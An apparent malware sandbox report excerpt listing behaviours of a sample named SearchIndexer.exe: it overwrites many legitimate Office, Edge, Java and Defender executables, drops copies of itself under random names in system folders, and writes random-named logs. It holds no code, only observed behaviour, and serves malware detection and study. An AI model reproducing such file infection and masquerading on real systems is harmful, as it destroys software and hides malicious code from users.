Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	Jump to behavior

Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\LabWdNFO.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\uWHiFCKf.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\rOKZjkQk.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\QWQVqwoz.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\DiJGaagK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\YAYKaqDh.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\csYLXLvO.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\kpEaCKQF.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\TYnVXEze.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\yVVZwldW.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\sRLquvOw.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\WqYmKtXd.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\CaAofPGe.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\IniXRspB.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Users\user\AppData\Local\Temp\chrome.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\YUdUknhP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\oJaATZbJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\BAeGeXTe.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File created: C:\Users\user\Desktop\jzkKkMJA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\zysYIoOi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File created: C:\Users\user\Desktop\lSjJLcbQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
